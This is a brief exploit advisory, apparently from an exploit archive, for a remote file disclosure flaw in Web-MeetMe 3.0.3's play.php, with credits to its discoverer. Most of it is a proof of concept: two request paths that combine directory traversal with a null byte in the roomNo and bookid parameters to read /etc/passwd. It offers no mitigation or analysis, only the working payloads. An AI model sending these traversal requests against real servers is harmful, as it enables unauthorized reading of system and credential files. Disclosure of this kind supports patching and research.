Web-MeetMe 3.0.3 Remote File Disclosure Vulnerability. Downlaod at sourceforge
|Web-MeetMe 3.0.3 (play.php) Remote File Disclosure Vulnerability |
|Download Script : |
| http://sourceforge.net/project/showfiles.php?group_id=164788 |
|POC : |
| Web-MeetMe_v3.0.3/play.php?roomNo=../../../../../../../../etc/passwd%00 |
| Web-MeetMe_v3.0.3/play.php?bookid=../../../../../../../../etc/passwd%00 |
|Discovered by : Evil.Man |
|Home Page : Tryag.Com/cc |
|Email : [email protected] |
|Sp.Thanx To : GoLd_M [Mahmood_ali"Tryag.Com"] & Sniper-Sa.Com |
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